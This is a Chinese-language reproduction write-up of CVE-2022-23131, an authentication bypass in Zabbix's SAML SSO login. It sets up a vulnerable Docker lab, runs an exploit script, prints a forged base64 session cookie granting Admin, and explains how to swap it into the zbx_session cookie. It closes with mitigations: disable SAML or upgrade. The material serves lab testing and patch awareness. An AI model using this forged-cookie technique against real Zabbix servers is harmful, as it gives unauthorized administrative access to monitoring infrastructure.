漏洞编号:CVE-2022-23131
漏洞威胁等级:高危
Zabbix
是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU
负载和网络流量等指标。
Zabbix
对客户端提交的Cookie
会话存在不安全的存储方式,导致在启动SAML SSO
认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE
。
Zabbix Web前端版本包括
虽然官方给是zabbix版本在5.4.0-5.4.8
这个区间受影响,但是我在zabbix 5.4.11
也同样复现了这个问题。
# 快速构建zabbix环境
]# docker run --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
158e737a3794 lutixiaya/zabbix-cve_2022_23131:latest "/bin/sh -c 'bash /r…" 3 seconds ago Up 2 seconds 0.0.0.0:49153->80/tcp, :::49153->80/tcp competent_diffie
可以看到启用了SAML
认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie
可以跳过认证。
修改cookie
:
~]# python CVE-2022-23131.py http://ip:49153/
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}
加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
复制上面加密后Payload
,修改zbx_session
(在浏览器按F12,打开开发者工具)的值。
修改完成之后,再次点击SAML
,可直接跳过认证登陆!
临时方案:禁用 SAML
身份验证
推荐方案:升级安全版本
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。